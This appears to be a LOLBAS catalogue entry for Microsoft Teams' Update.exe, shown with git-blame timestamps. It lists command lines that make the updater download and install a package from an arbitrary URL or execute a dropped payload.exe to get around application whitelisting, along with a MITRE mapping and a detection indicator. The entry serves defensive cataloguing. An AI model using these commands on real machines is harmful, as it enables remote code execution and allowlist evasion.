2019-06-27 14:26:24 +02:00
---
Name : Update.exe
2019-06-27 17:12:23 +02:00
Description : Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
2019-06-27 17:01:34 +02:00
Author : 'Oddvar Moe'
Created : '2019-06-26'
2019-06-27 14:26:24 +02:00
Commands :
- Command : Update.exe --download [url to package]
2019-06-27 17:12:23 +02:00
Description : The above binary will go to url and look for RELEASES file and download the nuget package.
2019-06-28 09:05:27 +02:00
Usecase : Download binary
Category : Download
2019-06-27 17:01:34 +02:00
Privileges : User
2019-06-27 14:26:24 +02:00
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
2019-06-27 17:01:34 +02:00
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2019-06-28 09:05:27 +02:00
- Command : Update.exe --update [url to package]
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package.
2019-06-27 14:26:24 +02:00
Usecase : Download and execute binary
Category : AWL Bypass
2019-06-27 17:01:34 +02:00
Privileges : User
2019-06-27 14:26:24 +02:00
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
2019-06-27 17:01:34 +02:00
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2019-06-28 09:05:27 +02:00
- Command : Update.exe --update [url to package]
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package.
2019-06-27 14:26:24 +02:00
Usecase : Download and execute binary
2019-06-28 09:05:27 +02:00
Category : Execute
2019-06-27 17:01:34 +02:00
Privileges : User
2019-06-27 14:26:24 +02:00
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
2019-06-27 17:01:34 +02:00
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2019-07-02 09:06:19 +02:00
- Command : Update.exe --updateRoolback=[url to package]
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase : Download and execute binary
Category : AWL Bypass
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
OperatingSystem : Windows 7 and up with Microsoft Teams installed
- Command : Update.exe --updateRollback=[url to package]
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase : Download and execute binary
Category : Execute
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2019-06-27 17:01:34 +02:00
- Command : Update.exe --processStart payload.exe --process-start-args "whatever args"
Description : Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase : Application Whitelisting Bypass
Category : AWL Bypass
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem : Windows 7 and up with Microsoft Teams installed
- Command : Update.exe --processStart payload.exe --process-start-args "whatever args"
Description : Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase : Execute binary
Category : Execute
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2019-06-27 14:26:24 +02:00
Full_Path :
2019-06-27 17:01:34 +02:00
- Path : '%localappdata%\Microsoft\Teams\update.exe'
2019-06-27 14:26:24 +02:00
Code_Sample :
2019-06-27 17:01:34 +02:00
- Code : https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
2019-06-27 14:26:24 +02:00
Detection :
2019-06-27 17:01:34 +02:00
- IOC : Update.exe spawned an unknown process
2019-06-27 14:26:24 +02:00
Resources :
2019-06-27 17:01:34 +02:00
- Link : https://www.youtube.com/watch?v=rOP3hnkj7ls
- Link : https://twitter.com/reegun21/status/1144182772623269889
- Link : https://twitter.com/MrUn1k0d3r/status/1143928885211537408
- Link : http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
2019-06-28 08:48:41 +02:00
- Link : https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
2019-07-02 09:06:19 +02:00
- Link : https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
2019-06-27 17:01:34 +02:00
Acknowledgement :
2019-06-27 14:26:24 +02:00
- Person : Reegun J (OCBC Bank)
2019-06-27 17:01:34 +02:00
Handle : '@reegun21'
2019-06-27 14:26:24 +02:00
- Person : Mr.Un1k0d3r
2019-06-27 17:01:34 +02:00
Handle : '@MrUn1k0d3r'
- Person : Adam
Handle : '@Hexacorn'
2019-06-27 14:26:24 +02:00
---